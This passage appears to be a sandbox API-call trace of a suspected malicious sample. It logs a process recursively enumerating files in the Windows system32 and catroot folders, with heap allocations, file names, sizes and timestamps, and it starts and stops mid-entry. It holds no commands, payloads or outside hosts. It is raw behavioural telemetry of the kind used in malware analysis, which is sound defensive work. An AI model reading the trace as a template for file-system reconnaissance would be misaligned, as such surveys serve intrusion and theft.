RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454bf8 [0027.731] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a679055, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a679055, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a679055, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="browseui.dll", cAlternateFileName="")) returned 1 [0027.731] lstrlenW (lpString="browseui.dll") returned 12 [0027.732] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x457588 [0027.732] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8455446, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8455446, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa847b5a6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthprops.cpl", cAlternateFileName="")) returned 1 [0027.732] lstrlenW (lpString="bthprops.cpl") returned 12 [0027.732] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7d8d73d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0xd7d8d73d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x663849f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthudtask.exe", cAlternateFileName="")) returned 1 [0027.732] lstrlenW (lpString="bthudtask.exe") returned 13 [0027.732] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9c) returned 0x457630 [0027.732] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf03c839e, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0xf03c839e, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x827c9df0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x10400, dwReserved0=0x0, dwReserved1=0x0, cFileName="btpanui.dll", cAlternateFileName="")) returned 1 [0027.732] lstrlenW (lpString="btpanui.dll") returned 11 [0027.732] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454c98 [0027.732] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb31a7765, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb31a7765, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3265e46, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bubbles.scr", cAlternateFileName="")) returned 1 [0027.732] lstrlenW (lpString="Bubbles.scr") returned 11 [0027.732] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a34e9a7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8a34e9a7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x827c9df0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xfa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWContextHandler.dll", cAlternateFileName="")) returned 1 [0027.732] lstrlenW (lpString="BWContextHandler.dll") returned 20 [0027.732] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xaa) returned 0x458b58 [0027.732] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8731ad6b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8731ad6b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x827ee7e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWUnpairElevated.dll", cAlternateFileName="")) returned 1 [0027.732] lstrlenW (lpString="BWUnpairElevated.dll") returned 20 [0027.732] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xaa) returned 0x458c10 [0027.732] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2e6f4f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a2e6f4f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a30d0af, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabinet.dll", cAlternateFileName="")) returned 1 [0027.732] lstrlenW (lpString="cabinet.dll") returned 11 [0027.732] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454d38 [0027.732] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2c0def, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a2c0def, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a2c0def, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabview.dll", cAlternateFileName="")) returned 1 [0027.732] lstrlenW (lpString="cabview.dll") returned 11 [0027.732] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454dd8 [0027.733] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9639a6c, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0xc9639a6c, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x663abaf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0x0, dwReserved1=0x0, cFileName="cacls.exe", cAlternateFileName="")) returned 1 [0027.733] lstrlenW (lpString="cacls.exe") returned 9 [0027.733] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x94) returned 0x454e78 [0027.733] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb34a12ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb34a12ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb34ed5ab, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xbd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="calc.exe", cAlternateFileName="")) returned 1 [0027.733] lstrlenW (lpString="calc.exe") returned 8 [0027.733] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x92) returned 0x454f18 [0027.733] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe154e3d9, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe154e3d9, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x829926a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capiprovider.dll", cAlternateFileName="")) returned 1 [0027.733] lstrlenW (lpString="capiprovider.dll") returned 16 [0027.733] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa2) returned 0x458cc8 [0027.733] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f291a9a, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3f291a9a, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x829b97a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capisp.dll", cAlternateFileName="")) returned 1 [0027.733] lstrlenW (lpString="capisp.dll") returned 10 [0027.733] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x454fb8 [0027.733] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xe3986c, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xc4c8bad2, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="catroot", cAlternateFileName="")) returned 1 [0027.733] lstrlenW (lpString="catroot") returned 7 [0027.733] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x458d78 [0027.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\*", lpFindFileData=0x458d78 | out: lpFindFileData=0x458d78*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.733] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458d78 | out: lpFindFileData=0x458d78*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0027.734] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458d78 | out: lpFindFileData=0x458d78*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}", cAlternateFileName="{127D0~1")) returned 1 [0027.734] lstrlenW (lpString="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}") returned 38 [0027.734] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x459fd8 [0027.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45a230 [0027.734] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0027.734] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0027.734] FindClose (in: hFindFile=0x45a230 | out: hFindFile=0x45a230) returned 1 [0027.734] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x459fd8 | out: hHeap=0x420000) returned 1 [0027.734] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x458d78 | out: lpFindFileData=0x458d78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}", cAlternateFileName="{F750E~1")) returned 1 [0027.734] lstrlenW (lpString="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}") returned 38 [0027.734] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x459fd8 [0027.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45a230 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x36c8d955, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x36c8d955, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x136fa600, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x350c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI636C~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x36b82fb3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x36b82fb3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf5a24100, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x5e64, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI18AE~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 94 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5eef4f35, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5eef4f35, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x52592800, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x3d1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI4C4D~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 82 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28be7b78, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x28be7b78, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc7246600, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x29248, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4AB2~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 77 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6ea88624, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6ea88624, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x2db18000, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC133~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3bce4069, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3bce4069, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3ac67300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4044~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 84 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6eb20ba5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6eb20ba5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae23b100, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2172, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI32E6~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 97 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3bda274b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3bda274b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x3ac67300, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x2724, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI197C~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Results-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 92 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64884b99, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x64884b99, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x180700, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x306c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIA8CF~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 80 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x2e2f0078, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x2e2f0078, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xbd9afe00, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x60fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MIF331~1.CAT")) returned 1 [0027.735] lstrlenW (lpString="Microsoft-Windows-Backup-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 75 [0027.735] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x64bca9e0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x64bca9e0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xbb40a000, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x2bcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI0209~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 84 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x342733e8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x342733e8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc12e8500, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x4d91, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI1FC1~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 79 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58507b71, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x58507b71, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa82dd000, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x24e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC93D~1.CAT")) returned 1 [0027.736] lstrlenW (lpString="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 102 [0027.736] FindNextFileW (in: hFindFile=0x45a230, lpFindFileData=0x459fd8 | out: lpFindFileData=0x459fd8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3ea1e2bd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3ea1e2bd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x41ed8100, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x5474, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Branding-Professional-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI8EF9~1.CAT")) returned 1 [0027.736] lstrlenW 